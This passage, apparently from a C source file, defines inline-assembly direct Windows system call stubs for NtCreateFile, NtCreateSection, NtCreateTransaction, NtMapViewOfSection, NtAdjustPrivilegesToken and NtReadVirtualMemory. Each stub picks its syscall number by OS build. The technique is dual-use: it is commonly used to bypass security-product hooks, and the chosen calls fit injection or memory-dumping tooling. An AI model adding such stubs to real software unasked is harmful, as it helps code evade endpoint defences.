NtCreateFile_Epilogue \n\ 57 | NtCreateFile_SystemCall_6_2_XXXX: \n\ 58 | mov eax, 0x0053 \n\ 59 | jmp NtCreateFile_Epilogue \n\ 60 | NtCreateFile_SystemCall_6_3_XXXX: \n\ 61 | mov eax, 0x0054 \n\ 62 | jmp NtCreateFile_Epilogue \n\ 63 | NtCreateFile_SystemCall_10_0_10240: \n\ 64 | mov eax, 0x0055 \n\ 65 | jmp NtCreateFile_Epilogue \n\ 66 | NtCreateFile_SystemCall_10_0_10586: \n\ 67 | mov eax, 0x0055 \n\ 68 | jmp NtCreateFile_Epilogue \n\ 69 | NtCreateFile_SystemCall_10_0_14393: \n\ 70 | mov eax, 0x0055 \n\ 71 | jmp NtCreateFile_Epilogue \n\ 72 | NtCreateFile_SystemCall_10_0_15063: \n\ 73 | mov eax, 0x0055 \n\ 74 | jmp NtCreateFile_Epilogue \n\ 75 | NtCreateFile_SystemCall_10_0_16299: \n\ 76 | mov eax, 0x0055 \n\ 77 | jmp NtCreateFile_Epilogue \n\ 78 | NtCreateFile_SystemCall_10_0_17134: \n\ 79 | mov eax, 0x0055 \n\ 80 | jmp NtCreateFile_Epilogue \n\ 81 | NtCreateFile_SystemCall_10_0_17763: \n\ 82 | mov eax, 0x0055 \n\ 83 | jmp NtCreateFile_Epilogue \n\ 84 | NtCreateFile_SystemCall_10_0_18362: \n\ 85 | mov eax, 0x0055 \n\ 86 | jmp NtCreateFile_Epilogue \n\ 87 | NtCreateFile_SystemCall_10_0_18363: \n\ 88 | mov eax, 0x0055 \n\ 89 | jmp NtCreateFile_Epilogue \n\ 90 | NtCreateFile_SystemCall_10_0_19041: \n\ 91 | mov eax, 0x0055 \n\ 92 | jmp NtCreateFile_Epilogue \n\ 93 | NtCreateFile_SystemCall_10_0_19042: \n\ 94 | mov eax, 0x0055 \n\ 95 | jmp NtCreateFile_Epilogue \n\ 96 | NtCreateFile_SystemCall_Unknown: \n\ 97 | ret \n\ 98 | NtCreateFile_Epilogue: \n\ 99 | mov r10, rcx \n\ 100 | syscall \n\ 101 | ret \n\ 102 | "); 103 | 104 | #define ZwCreateSection NtCreateSection 105 | __asm__("NtCreateSection: \n\ 106 | mov rax, gs:[0x60] \n\ 107 | NtCreateSection_Check_X_X_XXXX: \n\ 108 | cmp dword ptr [rax+0x118], 6 \n\ 109 | je NtCreateSection_Check_6_X_XXXX \n\ 110 | cmp dword ptr [rax+0x118], 10 \n\ 111 | je NtCreateSection_Check_10_0_XXXX \n\ 112 | jmp NtCreateSection_SystemCall_Unknown \n\ 113 | NtCreateSection_Check_6_X_XXXX: \n\ 114 | cmp dword ptr [rax+0x11c], 1 \n\ 115 | je NtCreateSection_Check_6_1_XXXX \n\ 116 | cmp dword ptr [rax+0x11c], 2 \n\ 117 | je NtCreateSection_SystemCall_6_2_XXXX \n\ 118 | cmp dword ptr [rax+0x11c], 3 \n\ 119 | je NtCreateSection_SystemCall_6_3_XXXX \n\ 120 | jmp NtCreateSection_SystemCall_Unknown \n\ 121 | NtCreateSection_Check_6_1_XXXX: \n\ 122 | cmp word ptr [rax+0x120], 7600 \n\ 123 | je NtCreateSection_SystemCall_6_1_7600 \n\ 124 | cmp word ptr [rax+0x120], 7601 \n\ 125 | je NtCreateSection_SystemCall_6_1_7601 \n\ 126 | jmp NtCreateSection_SystemCall_Unknown \n\ 127 | NtCreateSection_Check_10_0_XXXX: \n\ 128 | cmp word ptr [rax+0x120], 10240 \n\ 129 | je NtCreateSection_SystemCall_10_0_10240 \n\ 130 | cmp word ptr [rax+0x120], 10586 \n\ 131 | je NtCreateSection_SystemCall_10_0_10586 \n\ 132 | cmp word ptr [rax+0x120], 14393 \n\ 133 | je NtCreateSection_SystemCall_10_0_14393 \n\ 134 | cmp word ptr [rax+0x120], 15063 \n\ 135 | je NtCreateSection_SystemCall_10_0_15063 \n\ 136 | cmp word ptr [rax+0x120], 16299 \n\ 137 | je NtCreateSection_SystemCall_10_0_16299 \n\ 138 | cmp word ptr [rax+0x120], 17134 \n\ 139 | je NtCreateSection_SystemCall_10_0_17134 \n\ 140 | cmp word ptr [rax+0x120], 17763 \n\ 141 | je NtCreateSection_SystemCall_10_0_17763 \n\ 142 | cmp word ptr [rax+0x120], 18362 \n\ 143 | je NtCreateSection_SystemCall_10_0_18362 \n\ 144 | cmp word ptr [rax+0x120], 18363 \n\ 145 | je NtCreateSection_SystemCall_10_0_18363 \n\ 146 | cmp word ptr [rax+0x120], 19041 \n\ 147 | je NtCreateSection_SystemCall_10_0_19041 \n\ 148 | cmp word ptr [rax+0x120], 19042 \n\ 149 | je NtCreateSection_SystemCall_10_0_19042 \n\ 150 | jmp NtCreateSection_SystemCall_Unknown \n\ 151 | NtCreateSection_SystemCall_6_1_7600: \n\ 152 | mov eax, 0x0047 \n\ 153 | jmp NtCreateSection_Epilogue \n\ 154 | NtCreateSection_SystemCall_6_1_7601: \n\ 155 | mov eax, 0x0047 \n\ 156 | jmp NtCreateSection_Epilogue \n\ 157 | NtCreateSection_SystemCall_6_2_XXXX: \n\ 158 | mov eax, 0x0048 \n\ 159 | jmp NtCreateSection_Epilogue \n\ 160 | NtCreateSection_SystemCall_6_3_XXXX: \n\ 161 | mov eax, 0x0049 \n\ 162 | jmp NtCreateSection_Epilogue \n\ 163 | NtCreateSection_SystemCall_10_0_10240: \n\ 164 | mov eax, 0x004a \n\ 165 | jmp NtCreateSection_Epilogue \n\ 166 | NtCreateSection_SystemCall_10_0_10586: \n\ 167 | mov eax, 0x004a \n\ 168 | jmp NtCreateSection_Epilogue \n\ 169 | NtCreateSection_SystemCall_10_0_14393: \n\ 170 | mov eax, 0x004a \n\ 171 | jmp NtCreateSection_Epilogue \n\ 172 | NtCreateSection_SystemCall_10_0_15063: \n\ 173 | mov eax, 0x004a \n\ 174 | jmp NtCreateSection_Epilogue \n\ 175 | NtCreateSection_SystemCall_10_0_16299: \n\ 176 | mov eax, 0x004a \n\ 177 | jmp NtCreateSection_Epilogue \n\ 178 | NtCreateSection_SystemCall_10_0_17134: \n\ 179 | mov eax, 0x004a \n\ 180 | jmp NtCreateSection_Epilogue \n\ 181 | NtCreateSection_SystemCall_10_0_17763: \n\ 182 | mov eax, 0x004a \n\ 183 | jmp NtCreateSection_Epilogue \n\ 184 | NtCreateSection_SystemCall_10_0_18362: \n\ 185 | mov eax, 0x004a \n\ 186 | jmp NtCreateSection_Epilogue \n\ 187 | NtCreateSection_SystemCall_10_0_18363: \n\ 188 | mov eax, 0x004a \n\ 189 | jmp NtCreateSection_Epilogue \n\ 190 | NtCreateSection_SystemCall_10_0_19041: \n\ 191 | mov eax, 0x004a \n\ 192 | jmp NtCreateSection_Epilogue \n\ 193 | NtCreateSection_SystemCall_10_0_19042: \n\ 194 | mov eax, 0x004a \n\ 195 | jmp NtCreateSection_Epilogue \n\ 196 | NtCreateSection_SystemCall_Unknown: \n\ 197 | ret \n\ 198 | NtCreateSection_Epilogue: \n\ 199 | mov r10, rcx \n\ 200 | syscall \n\ 201 | ret \n\ 202 | "); 203 | 204 | #define ZwCreateTransaction NtCreateTransaction 205 | __asm__("NtCreateTransaction: \n\ 206 | mov rax, gs:[0x60] \n\ 207 | NtCreateTransaction_Check_X_X_XXXX: \n\ 208 | cmp dword ptr [rax+0x118], 6 \n\ 209 | je NtCreateTransaction_Check_6_X_XXXX \n\ 210 | cmp dword ptr [rax+0x118], 10 \n\ 211 | je NtCreateTransaction_Check_10_0_XXXX \n\ 212 | jmp NtCreateTransaction_SystemCall_Unknown \n\ 213 | NtCreateTransaction_Check_6_X_XXXX: \n\ 214 | cmp dword ptr [rax+0x11c], 1 \n\ 215 | je NtCreateTransaction_Check_6_1_XXXX \n\ 216 | cmp dword ptr [rax+0x11c], 2 \n\ 217 | je NtCreateTransaction_SystemCall_6_2_XXXX \n\ 218 | cmp dword ptr [rax+0x11c], 3 \n\ 219 | je NtCreateTransaction_SystemCall_6_3_XXXX \n\ 220 | jmp NtCreateTransaction_SystemCall_Unknown \n\ 221 | NtCreateTransaction_Check_6_1_XXXX: \n\ 222 | cmp word ptr [rax+0x120], 7600 \n\ 223 | je NtCreateTransaction_SystemCall_6_1_7600 \n\ 224 | cmp word ptr [rax+0x120], 7601 \n\ 225 | je NtCreateTransaction_SystemCall_6_1_7601 \n\ 226 | jmp NtCreateTransaction_SystemCall_Unknown \n\ 227 | NtCreateTransaction_Check_10_0_XXXX: \n\ 228 | cmp word ptr [rax+0x120], 10240 \n\ 229 | je NtCreateTransaction_SystemCall_10_0_10240 \n\ 230 | cmp word ptr [rax+0x120], 10586 \n\ 231 | je NtCreateTransaction_SystemCall_10_0_10586 \n\ 232 | cmp word ptr [rax+0x120], 14393 \n\ 233 | je NtCreateTransaction_SystemCall_10_0_14393 \n\ 234 | cmp word ptr [rax+0x120], 15063 \n\ 235 | je NtCreateTransaction_SystemCall_10_0_15063 \n\ 236 | cmp word ptr [rax+0x120], 16299 \n\ 237 | je NtCreateTransaction_SystemCall_10_0_16299 \n\ 238 | cmp word ptr [rax+0x120], 17134 \n\ 239 | je NtCreateTransaction_SystemCall_10_0_17134 \n\ 240 | cmp word ptr [rax+0x120], 17763 \n\ 241 | je NtCreateTransaction_SystemCall_10_0_17763 \n\ 242 | cmp word ptr [rax+0x120], 18362 \n\ 243 | je NtCreateTransaction_SystemCall_10_0_18362 \n\ 244 | cmp word ptr [rax+0x120], 18363 \n\ 245 | je NtCreateTransaction_SystemCall_10_0_18363 \n\ 246 | cmp word ptr [rax+0x120], 19041 \n\ 247 | je NtCreateTransaction_SystemCall_10_0_19041 \n\ 248 | cmp word ptr [rax+0x120], 19042 \n\ 249 | je NtCreateTransaction_SystemCall_10_0_19042 \n\ 250 | jmp NtCreateTransaction_SystemCall_Unknown \n\ 251 | NtCreateTransaction_SystemCall_6_1_7600: \n\ 252 | mov eax, 0x00a8 \n\ 253 | jmp NtCreateTransaction_Epilogue \n\ 254 | NtCreateTransaction_SystemCall_6_1_7601: \n\ 255 | mov eax, 0x00a8 \n\ 256 | jmp NtCreateTransaction_Epilogue \n\ 257 | NtCreateTransaction_SystemCall_6_2_XXXX: \n\ 258 | mov eax, 0x00b3 \n\ 259 | jmp NtCreateTransaction_Epilogue \n\ 260 | NtCreateTransaction_SystemCall_6_3_XXXX: \n\ 261 | mov eax, 0x00b5 \n\ 262 | jmp NtCreateTransaction_Epilogue \n\ 263 | NtCreateTransaction_SystemCall_10_0_10240: \n\ 264 | mov eax, 0x00b8 \n\ 265 | jmp NtCreateTransaction_Epilogue \n\ 266 | NtCreateTransaction_SystemCall_10_0_10586: \n\ 267 | mov eax, 0x00b9 \n\ 268 | jmp NtCreateTransaction_Epilogue \n\ 269 | NtCreateTransaction_SystemCall_10_0_14393: \n\ 270 | mov eax, 0x00bb \n\ 271 | jmp NtCreateTransaction_Epilogue \n\ 272 | NtCreateTransaction_SystemCall_10_0_15063: \n\ 273 | mov eax, 0x00be \n\ 274 | jmp NtCreateTransaction_Epilogue \n\ 275 | NtCreateTransaction_SystemCall_10_0_16299: \n\ 276 | mov eax, 0x00bf \n\ 277 | jmp NtCreateTransaction_Epilogue \n\ 278 | NtCreateTransaction_SystemCall_10_0_17134: \n\ 279 | mov eax, 0x00c0 \n\ 280 | jmp NtCreateTransaction_Epilogue \n\ 281 | NtCreateTransaction_SystemCall_10_0_17763: \n\ 282 | mov eax, 0x00c1 \n\ 283 | jmp NtCreateTransaction_Epilogue \n\ 284 | NtCreateTransaction_SystemCall_10_0_18362: \n\ 285 | mov eax, 0x00c2 \n\ 286 | jmp NtCreateTransaction_Epilogue \n\ 287 | NtCreateTransaction_SystemCall_10_0_18363: \n\ 288 | mov eax, 0x00c2 \n\ 289 | jmp NtCreateTransaction_Epilogue \n\ 290 | NtCreateTransaction_SystemCall_10_0_19041: \n\ 291 | mov eax, 0x00c6 \n\ 292 | jmp NtCreateTransaction_Epilogue \n\ 293 | NtCreateTransaction_SystemCall_10_0_19042: \n\ 294 | mov eax, 0x00c6 \n\ 295 | jmp NtCreateTransaction_Epilogue \n\ 296 | NtCreateTransaction_SystemCall_Unknown: \n\ 297 | ret \n\ 298 | NtCreateTransaction_Epilogue: \n\ 299 | mov r10, rcx \n\ 300 | syscall \n\ 301 | ret \n\ 302 | "); 303 | 304 | #define ZwMapViewOfSection NtMapViewOfSection 305 | __asm__("NtMapViewOfSection: \n\ 306 | mov rax, gs:[0x60] \n\ 307 | NtMapViewOfSection_Check_X_X_XXXX: \n\ 308 | cmp dword ptr [rax+0x118], 6 \n\ 309 | je NtMapViewOfSection_Check_6_X_XXXX \n\ 310 | cmp dword ptr [rax+0x118], 10 \n\ 311 | je NtMapViewOfSection_Check_10_0_XXXX \n\ 312 | jmp NtMapViewOfSection_SystemCall_Unknown \n\ 313 | NtMapViewOfSection_Check_6_X_XXXX: \n\ 314 | cmp dword ptr [rax+0x11c], 1 \n\ 315 | je NtMapViewOfSection_Check_6_1_XXXX \n\ 316 | cmp dword ptr [rax+0x11c], 2 \n\ 317 | je NtMapViewOfSection_SystemCall_6_2_XXXX \n\ 318 | cmp dword ptr [rax+0x11c], 3 \n\ 319 | je NtMapViewOfSection_SystemCall_6_3_XXXX \n\ 320 | jmp NtMapViewOfSection_SystemCall_Unknown \n\ 321 | NtMapViewOfSection_Check_6_1_XXXX: \n\ 322 | cmp word ptr [rax+0x120], 7600 \n\ 323 | je NtMapViewOfSection_SystemCall_6_1_7600 \n\ 324 | cmp word ptr [rax+0x120], 7601 \n\ 325 | je NtMapViewOfSection_SystemCall_6_1_7601 \n\ 326 | jmp NtMapViewOfSection_SystemCall_Unknown \n\ 327 | NtMapViewOfSection_Check_10_0_XXXX: \n\ 328 | cmp word ptr [rax+0x120], 10240 \n\ 329 | je NtMapViewOfSection_SystemCall_10_0_10240 \n\ 330 | cmp word ptr [rax+0x120], 10586 \n\ 331 | je NtMapViewOfSection_SystemCall_10_0_10586 \n\ 332 | cmp word ptr [rax+0x120], 14393 \n\ 333 | je NtMapViewOfSection_SystemCall_10_0_14393 \n\ 334 | cmp word ptr [rax+0x120], 15063 \n\ 335 | je NtMapViewOfSection_SystemCall_10_0_15063 \n\ 336 | cmp word ptr [rax+0x120], 16299 \n\ 337 | je NtMapViewOfSection_SystemCall_10_0_16299 \n\ 338 | cmp word ptr [rax+0x120], 17134 \n\ 339 | je NtMapViewOfSection_SystemCall_10_0_17134 \n\ 340 | cmp word ptr [rax+0x120], 17763 \n\ 341 | je NtMapViewOfSection_SystemCall_10_0_17763 \n\ 342 | cmp word ptr [rax+0x120], 18362 \n\ 343 | je NtMapViewOfSection_SystemCall_10_0_18362 \n\ 344 | cmp word ptr [rax+0x120], 18363 \n\ 345 | je NtMapViewOfSection_SystemCall_10_0_18363 \n\ 346 | cmp word ptr [rax+0x120], 19041 \n\ 347 | je NtMapViewOfSection_SystemCall_10_0_19041 \n\ 348 | cmp word ptr [rax+0x120], 19042 \n\ 349 | je NtMapViewOfSection_SystemCall_10_0_19042 \n\ 350 | jmp NtMapViewOfSection_SystemCall_Unknown \n\ 351 | NtMapViewOfSection_SystemCall_6_1_7600: \n\ 352 | mov eax, 0x0025 \n\ 353 | jmp NtMapViewOfSection_Epilogue \n\ 354 | NtMapViewOfSection_SystemCall_6_1_7601: \n\ 355 | mov eax, 0x0025 \n\ 356 | jmp NtMapViewOfSection_Epilogue \n\ 357 | NtMapViewOfSection_SystemCall_6_2_XXXX: \n\ 358 | mov eax, 0x0026 \n\ 359 | jmp NtMapViewOfSection_Epilogue \n\ 360 | NtMapViewOfSection_SystemCall_6_3_XXXX: \n\ 361 | mov eax, 0x0027 \n\ 362 | jmp NtMapViewOfSection_Epilogue \n\ 363 | NtMapViewOfSection_SystemCall_10_0_10240: \n\ 364 | mov eax, 0x0028 \n\ 365 | jmp NtMapViewOfSection_Epilogue \n\ 366 | NtMapViewOfSection_SystemCall_10_0_10586: \n\ 367 | mov eax, 0x0028 \n\ 368 | jmp NtMapViewOfSection_Epilogue \n\ 369 | NtMapViewOfSection_SystemCall_10_0_14393: \n\ 370 | mov eax, 0x0028 \n\ 371 | jmp NtMapViewOfSection_Epilogue \n\ 372 | NtMapViewOfSection_SystemCall_10_0_15063: \n\ 373 | mov eax, 0x0028 \n\ 374 | jmp NtMapViewOfSection_Epilogue \n\ 375 | NtMapViewOfSection_SystemCall_10_0_16299: \n\ 376 | mov eax, 0x0028 \n\ 377 | jmp NtMapViewOfSection_Epilogue \n\ 378 | NtMapViewOfSection_SystemCall_10_0_17134: \n\ 379 | mov eax, 0x0028 \n\ 380 | jmp NtMapViewOfSection_Epilogue \n\ 381 | NtMapViewOfSection_SystemCall_10_0_17763: \n\ 382 | mov eax, 0x0028 \n\ 383 | jmp NtMapViewOfSection_Epilogue \n\ 384 | NtMapViewOfSection_SystemCall_10_0_18362: \n\ 385 | mov eax, 0x0028 \n\ 386 | jmp NtMapViewOfSection_Epilogue \n\ 387 | NtMapViewOfSection_SystemCall_10_0_18363: \n\ 388 | mov eax, 0x0028 \n\ 389 | jmp NtMapViewOfSection_Epilogue \n\ 390 | NtMapViewOfSection_SystemCall_10_0_19041: \n\ 391 | mov eax, 0x0028 \n\ 392 | jmp NtMapViewOfSection_Epilogue \n\ 393 | NtMapViewOfSection_SystemCall_10_0_19042: \n\ 394 | mov eax, 0x0028 \n\ 395 | jmp NtMapViewOfSection_Epilogue \n\ 396 | NtMapViewOfSection_SystemCall_Unknown: \n\ 397 | ret \n\ 398 | NtMapViewOfSection_Epilogue: \n\ 399 | mov r10, rcx \n\ 400 | syscall \n\ 401 | ret \n\ 402 | "); 403 | 404 | #define ZwAdjustPrivilegesToken NtAdjustPrivilegesToken 405 | __asm__("NtAdjustPrivilegesToken: \n\ 406 | mov rax, gs:[0x60] \n\ 407 | NtAdjustPrivilegesToken_Check_X_X_XXXX: \n\ 408 | cmp dword ptr [rax+0x118], 6 \n\ 409 | je NtAdjustPrivilegesToken_Check_6_X_XXXX \n\ 410 | cmp dword ptr [rax+0x118], 10 \n\ 411 | je NtAdjustPrivilegesToken_Check_10_0_XXXX \n\ 412 | jmp NtAdjustPrivilegesToken_SystemCall_Unknown \n\ 413 | NtAdjustPrivilegesToken_Check_6_X_XXXX: \n\ 414 | cmp dword ptr [rax+0x11c], 1 \n\ 415 | je NtAdjustPrivilegesToken_Check_6_1_XXXX \n\ 416 | cmp dword ptr [rax+0x11c], 2 \n\ 417 | je NtAdjustPrivilegesToken_SystemCall_6_2_XXXX \n\ 418 | cmp dword ptr [rax+0x11c], 3 \n\ 419 | je NtAdjustPrivilegesToken_SystemCall_6_3_XXXX \n\ 420 | jmp NtAdjustPrivilegesToken_SystemCall_Unknown \n\ 421 | NtAdjustPrivilegesToken_Check_6_1_XXXX: \n\ 422 | cmp word ptr [rax+0x120], 7600 \n\ 423 | je NtAdjustPrivilegesToken_SystemCall_6_1_7600 \n\ 424 | cmp word ptr [rax+0x120], 7601 \n\ 425 | je NtAdjustPrivilegesToken_SystemCall_6_1_7601 \n\ 426 | jmp NtAdjustPrivilegesToken_SystemCall_Unknown \n\ 427 | NtAdjustPrivilegesToken_Check_10_0_XXXX: \n\ 428 | cmp word ptr [rax+0x120], 10240 \n\ 429 | je NtAdjustPrivilegesToken_SystemCall_10_0_10240 \n\ 430 | cmp word ptr [rax+0x120], 10586 \n\ 431 | je NtAdjustPrivilegesToken_SystemCall_10_0_10586 \n\ 432 | cmp word ptr [rax+0x120], 14393 \n\ 433 | je NtAdjustPrivilegesToken_SystemCall_10_0_14393 \n\ 434 | cmp word ptr [rax+0x120], 15063 \n\ 435 | je NtAdjustPrivilegesToken_SystemCall_10_0_15063 \n\ 436 | cmp word ptr [rax+0x120], 16299 \n\ 437 | je NtAdjustPrivilegesToken_SystemCall_10_0_16299 \n\ 438 | cmp word ptr [rax+0x120], 17134 \n\ 439 | je NtAdjustPrivilegesToken_SystemCall_10_0_17134 \n\ 440 | cmp word ptr [rax+0x120], 17763 \n\ 441 | je NtAdjustPrivilegesToken_SystemCall_10_0_17763 \n\ 442 | cmp word ptr [rax+0x120], 18362 \n\ 443 | je NtAdjustPrivilegesToken_SystemCall_10_0_18362 \n\ 444 | cmp word ptr [rax+0x120], 18363 \n\ 445 | je NtAdjustPrivilegesToken_SystemCall_10_0_18363 \n\ 446 | cmp word ptr [rax+0x120], 19041 \n\ 447 | je NtAdjustPrivilegesToken_SystemCall_10_0_19041 \n\ 448 | cmp word ptr [rax+0x120], 19042 \n\ 449 | je NtAdjustPrivilegesToken_SystemCall_10_0_19042 \n\ 450 | jmp NtAdjustPrivilegesToken_SystemCall_Unknown \n\ 451 | NtAdjustPrivilegesToken_SystemCall_6_1_7600: \n\ 452 | mov eax, 0x003e \n\ 453 | jmp NtAdjustPrivilegesToken_Epilogue \n\ 454 | NtAdjustPrivilegesToken_SystemCall_6_1_7601: \n\ 455 | mov eax, 0x003e \n\ 456 | jmp NtAdjustPrivilegesToken_Epilogue \n\ 457 | NtAdjustPrivilegesToken_SystemCall_6_2_XXXX: \n\ 458 | mov eax, 0x003f \n\ 459 | jmp NtAdjustPrivilegesToken_Epilogue \n\ 460 | NtAdjustPrivilegesToken_SystemCall_6_3_XXXX: \n\ 461 | mov eax, 0x0040 \n\ 462 | jmp NtAdjustPrivilegesToken_Epilogue \n\ 463 | NtAdjustPrivilegesToken_SystemCall_10_0_10240: \n\ 464 | mov eax, 0x0041 \n\ 465 | jmp NtAdjustPrivilegesToken_Epilogue \n\ 466 | NtAdjustPrivilegesToken_SystemCall_10_0_10586: \n\ 467 | mov eax, 0x0041 \n\ 468 | jmp NtAdjustPrivilegesToken_Epilogue \n\ 469 | NtAdjustPrivilegesToken_SystemCall_10_0_14393: \n\ 470 | mov eax, 0x0041 \n\ 471 | jmp NtAdjustPrivilegesToken_Epilogue \n\ 472 | NtAdjustPrivilegesToken_SystemCall_10_0_15063: \n\ 473 | mov eax, 0x0041 \n\ 474 | jmp NtAdjustPrivilegesToken_Epilogue \n\ 475 | NtAdjustPrivilegesToken_SystemCall_10_0_16299: \n\ 476 | mov eax, 0x0041 \n\ 477 | jmp NtAdjustPrivilegesToken_Epilogue \n\ 478 | NtAdjustPrivilegesToken_SystemCall_10_0_17134: \n\ 479 | mov eax, 0x0041 \n\ 480 | jmp NtAdjustPrivilegesToken_Epilogue \n\ 481 | NtAdjustPrivilegesToken_SystemCall_10_0_17763: \n\ 482 | mov eax, 0x0041 \n\ 483 | jmp NtAdjustPrivilegesToken_Epilogue \n\ 484 | NtAdjustPrivilegesToken_SystemCall_10_0_18362: \n\ 485 | mov eax, 0x0041 \n\ 486 | jmp NtAdjustPrivilegesToken_Epilogue \n\ 487 | NtAdjustPrivilegesToken_SystemCall_10_0_18363: \n\ 488 | mov eax, 0x0041 \n\ 489 | jmp NtAdjustPrivilegesToken_Epilogue \n\ 490 | NtAdjustPrivilegesToken_SystemCall_10_0_19041: \n\ 491 | mov eax, 0x0041 \n\ 492 | jmp NtAdjustPrivilegesToken_Epilogue \n\ 493 | NtAdjustPrivilegesToken_SystemCall_10_0_19042: \n\ 494 | mov eax, 0x0041 \n\ 495 | jmp NtAdjustPrivilegesToken_Epilogue \n\ 496 | NtAdjustPrivilegesToken_SystemCall_Unknown: \n\ 497 | ret \n\ 498 | NtAdjustPrivilegesToken_Epilogue: \n\ 499 | mov r10, rcx \n\ 500 | syscall \n\ 501 | ret \n\ 502 | "); 503 | 504 | #define ZwReadVirtualMemory NtReadVirtualMemory 505 | __asm__("NtReadVirtualMemory: \n\ 506 | mov rax, gs:[0x60] \n\ 507 | NtReadVirtualMemory_Check_X_X_XXXX: \n\ 508 | cmp dword ptr [rax+0x118], 6 \n\ 509 | je NtReadVirtualMemory_Check_6_X_XXXX \n\ 510 | cmp dword ptr [rax+0x118], 10 \n\ 511 | je NtReadVirtualMemory_Check_10_0_XXXX \n\ 512 | jmp NtReadVirtualMemory_SystemCall_Unknown \n\ 513 | NtReadVirtualMemory_Check_6_X_XXXX: \n\ 514 | cmp dword ptr [rax+0x11c], 1 \n\ 515 | je NtReadVirtualMemory_Check_6_1_XXXX \n\ 516 | cmp dword ptr [rax+0x11c], 2 \n\ 517 | je NtReadVirtualMemory_SystemCall_6_2_XXXX \n\ 518 | cmp dword ptr [rax+0x11c], 3 \n\ 519 | je NtReadVirtualMemory_SystemCall_6_3_XXXX \n\ 520 | jmp NtReadVirtualMemory_SystemCall_Unknown \n\ 521 | NtReadVirtualMemory_Check_6_1_XXXX: \n\ 522 | cmp word ptr [rax+0x120], 7600 \n\ 523 | je NtReadVirtualMemory_SystemCall_6_1_7600 \n\ 524 | cmp word ptr [rax+0x120], 7601 \n\ 525 | je NtReadVirtualMemory_SystemCall_6_1_7601 \n\ 526 | jmp NtReadVirtualMemory_SystemCall_Unknown \n\ 527 | NtReadVirtualMemory_Check_10_0_XXXX: \n\ 528 | cmp word ptr [rax+0x120], 10240 \n\ 529 | je NtReadVirtualMemory_SystemCall_10_0_10240 \n\ 530 | cmp word ptr [rax+0x120], 10586 \n\ 531 | je NtReadVirtualMemory_SystemCall_10_0_10586 \n\ 532 | cmp word ptr [rax+0x120], 14393 \n\ 533 | je NtReadVirtualMemory_SystemCall_10_0_14393 \n\ 534 | cmp word ptr [rax+0x120], 15063 \n\ 535 | je NtReadVirtualMemory_SystemCall_10_0_15063 \n\ 536 | cmp word ptr [rax+0x120], 16299 \n\ 537 | je NtReadVirtualMemory_SystemCall_10_0_16299 \n\ 538 | cmp word ptr [rax+0x120], 17134 \n\ 539 | je NtReadVirtualMemory_SystemCall_10_0_17134 \n\ 540 | cmp word ptr [rax+0x120], 17763 \n\ 541 | je NtReadVirtualMemory_SystemCall_10_0_17763 \n\ 542 | cmp word ptr [rax+0x120], 18362 \n\ 543 | je NtReadVirtualMemory_SystemCall_10_0_18362 \n\ 544 | cmp word ptr [rax+0x120], 18363 \n\ 545 | je NtReadVirtualMemory_SystemCall_10_0_18363 \n\ 546 | cmp word ptr [rax+0x120], 19041 \n\ 547 | je NtReadVirtualMemory_SystemCall_10_0_19041 \n\ 548 | cmp word ptr [rax+0x120], 19042 \n\ 549 | je NtReadVirtualMemory_SystemCall_10_0_19042 \n\ 550 | jmp NtReadVirtualMemory_SystemCall_Unknown \n\ 551 | NtReadVirtualMemory_SystemCall_6_1_7600: \n\ 552 | mov eax, 0x003c \n\ 553 | jmp NtReadVirtualMemory_Epilogue \n\ 554 | NtReadVirtualMemory_SystemCall_6_1_7601: \n\ 555 | mov eax, 0x003c \n\ 556 | jmp NtReadVirtualMemory_Epilogue \n\ 557 | NtReadVirtualMemory_SystemCall_6_2_XXXX: \n\ 558 | mov eax, 0x003d \n\ 559 | jmp NtReadVirtualMemory_Epilogue \n\ 560 | NtReadVirtualMemory_SystemCall_6_3_XXXX: \n\ 561 | mov eax, 0x003e \n\ 562 | jmp NtReadVirtualMemory_Epilogue \n\ 563 | NtReadVirtualMemory_SystemCall_10_0_10240: \n\ 564 | mov eax, 0x003f \n\ 565 | jmp NtReadVirtualMemory_Epilogue \n\ 566 | NtReadVirtualMemory_SystemCall_10_0_10586: \n\ 567 | mov eax, 0x003f \n\ 568 | jmp NtReadVirtualMemory_Epilogue \n\ 569 | NtReadVirtualMemory_SystemCall_10_0_14393: \n\ 570 | mov eax, 0x003f \n\ 571 | jmp NtReadVirtualMemory_Epilogue \n\ 572 | NtReadVirtualMemory_SystemCall_10_0_15063: \n\ 573 | mov eax, 0x003f \n\ 574 | jmp NtReadVirtualMemory_Epilogue \n\ 575 | NtReadVirtualMemory_SystemCall_10_0_16299: \n\ 576 | mov eax, 0x003f \n\ 577 | jmp NtReadVirtualMemory_Epilogue \n\ 578 | NtReadVirtualMemory_SystemCall_10_0_17134: \n\ 579 | mov eax, 0x003f \n\ 580 | jmp NtReadVirtualMemory_Epilogue \n\ 581 | NtReadVirtualMemory_SystemCall_10_0_17763: \n\ 582 | mov eax, 0x003f \n\ 583 | jmp NtReadVirtualMemory_Epilogue \n\ 584 | NtReadVirtualMemory_SystemCall_10_0_18362: \n\ 585 | mov eax, 0x003f \n\ 586 | jmp NtReadVirtualMemory_Epilogue \n\ 587 | NtReadVirtualMemory_SystemCall_10_0_18363: \n\ 588 | mov eax, 0x003f \n\ 589 | jmp NtReadVirtualMemory_Epilogue \n\ 590 | NtReadVirtualMemory_SystemCall_10_0_19041: \n\ 591 | mov eax, 0x003f \n\ 592 | jmp NtReadVirtualMemory_Epilogue \n\ 593 | NtReadVirtualMemory_SystemCall_10_0_19042: \n\ 594 | mov eax, 0x003f \n\ 595 | jmp NtReadVirtualMemory_Epilogue \n\ 596 | NtReadVirtualMemory_SystemCall_Unknown: \n\ 597 | ret \n\ 598 | NtReadVirtualMemory_Epilogue: \n\ 599 | mov r10, rcx \n\ 600 | syscall \n\ 601 | ret \n\ 602 | "); 603 | 604 | #define ZwOpenProcessToken NtOpenProcessToken 605 | __asm__("NtOpenProcessToken: \n\ 606 | mov rax, gs:[0x60] \n\ 607 | NtOpenProcessToken_Check_X_X_XXXX: \n\ 608 | cmp dword ptr [rax+0x118], 6 \n\ 609 | je NtOpenProcessToken_Check_6_X_XXXX \n\ 610 | cmp dword ptr [rax+0x118], 10 \n\ 611 | je NtOpenProcessToken_Check_10_0_XXXX \n\ 612 | jmp NtOpenProcessToken_SystemCall_Unknown \n\ 613 | NtOpenProcessToken_Check_6_X_XXXX: \n\ 614 | cmp dword ptr [rax+0x11c], 1 \n\ 615 | je NtOpenProcessToken_Check_6_1_XXXX \n\ 616 | cmp dword ptr [rax+0x11c], 2 \n\ 617 | je NtOpenProcessToken_SystemCall_6_2_XXXX \n\ 618 | cmp dword ptr [rax+0x11c], 3 \n\ 619 | je 